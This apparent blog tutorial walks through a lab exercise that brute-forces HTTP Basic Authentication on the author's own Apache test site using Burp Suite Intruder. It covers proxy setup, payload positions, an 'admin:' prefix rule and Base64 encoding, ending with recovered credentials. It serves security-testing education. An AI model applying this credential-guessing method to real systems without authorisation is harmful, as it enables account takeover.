AdSense

Monday, April 2, 2018

HTTP Basic Authentication bruteforce attack with Burp proxy


HTTP BASIC AUTHENTICATION BRUTEFORCE ATTACK WITH BURP PROXY

 - Layout for this exercise:

- This exercise is based in the previous post Setting up HTTP Basic Authentication.

 - In this case the goal  is to bruteforce HTTP Basic Authentication using the Burp Suite Proxy.

 - First of all, let's enable manually a proxy connection at the Firefox browser of Kali Linux.

 - Firefox -> Preferences -> Advanced > Network > Connection Settings:



- Manual proxy configuration: listening on localhost port 8080:



- Launching Burp:







- Options tab: checking that the proxy is listening on the localhost interface at port 8080:



- Connecting the browser to the web page protected with Basic Authentication:


- Burp intercepts the request to the web page:

- Forwarding the request:


- The Apache web server responds with the "Authentication Required" message. Let's introduce some arbitrary credentials, for instance "asdfg:asdfg":


- Burp intercepts the sending credentials:


- Now, Burp will help us to craft those sending credentials. For that purpose, the message is sent to the Intruder:


- The target of the attack is www.whitelist.com:


- The Positions tab helps to specify where to insert the payload for the attack. Decoding with Base64, the fake credentials "asdfg:asdfg" are revealed:






- Putting the username:password space between the section sign §:









- Going to the next tab, Payload sets the type of attack: Brute forcer.



- In this example the character set is simple, just 2 letters (ab), and the minimum and maximum number of characters is 5. 


- Adding a processing rule for the prefix "admin:", corresponding to the username:


- Adding a processing rule for Base64 encoding, used by Basic Authentication:


- The two rules for proccessing the payload:


- It is also very important to remove the character = for encoding, because = is used by Base64 for padding:





- The attack is ready to be started:





- Because the charset is 2 and the number of characters is 5, the total number of tries will be 2^5 = 32.

 - The attack starts, and the response status is 401 until a 200 answer is received. Obviously, the 200 message corresponds to a successful try:

- Decoding with Base64:



- The result is the correct credentials "admin:ababa":


- The web server responses, as expected, with the HTML code of the web page:





- Removing the proxy:








- Finally, authenticating the correct credentials the web page is available:








Posted by at
Labels: